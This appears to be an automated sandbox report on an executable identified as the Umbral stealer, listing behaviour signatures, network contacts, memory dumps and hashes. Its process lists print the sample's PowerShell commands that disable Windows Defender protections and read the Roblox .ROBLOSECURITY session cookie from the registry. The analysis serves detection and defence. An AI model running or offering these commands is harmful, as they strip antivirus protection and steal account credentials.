Analysis Overview
SHA256
d57da5841f0117edb2cd41d92c03de6385bbe69563abbcd902b8e09a111824e8
Threat Level: Known bad
The file Chad Manager (QUEST).exe was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral family
Umbral
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Unsigned PE
Checks processor information in registry
Modifies registry class
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Detects videocard installed
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-16 14:41
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-16 14:41
Reported
2023-11-16 14:44
Platform
win7-20231020-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe
"C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| NL | 142.250.179.131:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
memory/1668-0-0x00000000009B0000-0x0000000000A10000-memory.dmp
memory/1668-1-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/1668-2-0x000000001B220000-0x000000001B2A0000-memory.dmp
memory/2864-7-0x000000001B200000-0x000000001B4E2000-memory.dmp
memory/2864-8-0x0000000002040000-0x0000000002048000-memory.dmp
memory/2864-9-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/2864-10-0x0000000002590000-0x0000000002610000-memory.dmp
memory/2864-11-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/2864-12-0x0000000002590000-0x0000000002610000-memory.dmp
memory/2864-13-0x0000000002590000-0x0000000002610000-memory.dmp
memory/2864-14-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\53LJKW0F6I29M43W1VGS.temp
| MD5 | 87e71b71e5fc1a32aa84f2660d9c0fbd |
| SHA1 | bce141d432eaa3686ee0d07bf989b637db3b8db1 |
| SHA256 | 6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0 |
| SHA512 | 05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 87e71b71e5fc1a32aa84f2660d9c0fbd |
| SHA1 | bce141d432eaa3686ee0d07bf989b637db3b8db1 |
| SHA256 | 6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0 |
| SHA512 | 05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672 |
memory/2904-20-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
memory/2904-23-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2904-22-0x000007FEECD70000-0x000007FEED70D000-memory.dmp
memory/2904-24-0x000007FEECD70000-0x000007FEED70D000-memory.dmp
memory/2904-21-0x0000000002550000-0x0000000002558000-memory.dmp
memory/2904-25-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2904-26-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2904-27-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2904-28-0x000007FEECD70000-0x000007FEED70D000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 87e71b71e5fc1a32aa84f2660d9c0fbd |
| SHA1 | bce141d432eaa3686ee0d07bf989b637db3b8db1 |
| SHA256 | 6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0 |
| SHA512 | 05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672 |
memory/2232-42-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/2232-43-0x0000000002510000-0x0000000002590000-memory.dmp
memory/2232-44-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/2232-45-0x0000000002510000-0x0000000002590000-memory.dmp
memory/2232-46-0x0000000002510000-0x0000000002590000-memory.dmp
memory/1668-47-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
memory/2232-48-0x0000000002510000-0x0000000002590000-memory.dmp
memory/2232-49-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 87e71b71e5fc1a32aa84f2660d9c0fbd |
| SHA1 | bce141d432eaa3686ee0d07bf989b637db3b8db1 |
| SHA256 | 6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0 |
| SHA512 | 05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672 |
memory/2680-55-0x000007FEECD70000-0x000007FEED70D000-memory.dmp
memory/2680-56-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2680-57-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2680-58-0x000007FEECD70000-0x000007FEED70D000-memory.dmp
memory/1668-59-0x000000001B220000-0x000000001B2A0000-memory.dmp
memory/2680-60-0x0000000002450000-0x00000000024D0000-memory.dmp
memory/2680-61-0x000007FEECD70000-0x000007FEED70D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 87e71b71e5fc1a32aa84f2660d9c0fbd |
| SHA1 | bce141d432eaa3686ee0d07bf989b637db3b8db1 |
| SHA256 | 6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0 |
| SHA512 | 05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672 |
memory/784-68-0x000000001B190000-0x000000001B472000-memory.dmp
memory/784-69-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/784-70-0x00000000029B0000-0x0000000002A30000-memory.dmp
memory/784-71-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/784-72-0x00000000029B0000-0x0000000002A30000-memory.dmp
memory/784-73-0x00000000029B0000-0x0000000002A30000-memory.dmp
memory/784-74-0x00000000029B0000-0x0000000002A30000-memory.dmp
memory/784-75-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp
memory/1668-78-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-16 14:41
Reported
2023-11-16 14:45
Platform
win10v2004-20231023-en
Max time kernel
154s
Max time network
148s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe
"C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.0.949836820\615411944" -parentBuildID 20221007134813 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {79b3a245-a98d-460b-8383-322c588c76e4} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 1848 1df052e7758 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.1.899958553\2054731677" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6705a46-20d7-4220-b9bf-2542cef86d4a} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2380 1df0520ba58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.2.108238712\761756756" -childID 1 -isForBrowser -prefsHandle 3136 -prefMapHandle 3132 -prefsLen 21077 -prefMapSize 232675 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ed90c79-87e0-423c-9d91-cdaef33107ca} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 3020 1df094af958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1788.3.1960526725\825180378" -childID 2 -isForBrowser -prefsHandle 1328 -prefMapHandle 1324 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1380 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5dfeb2e-a135-4dea-aa33-d886b49bcf86} 1788 "\\.\pipe\gecko-crash-server-pipe.1788" 2712 1df07ce0e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
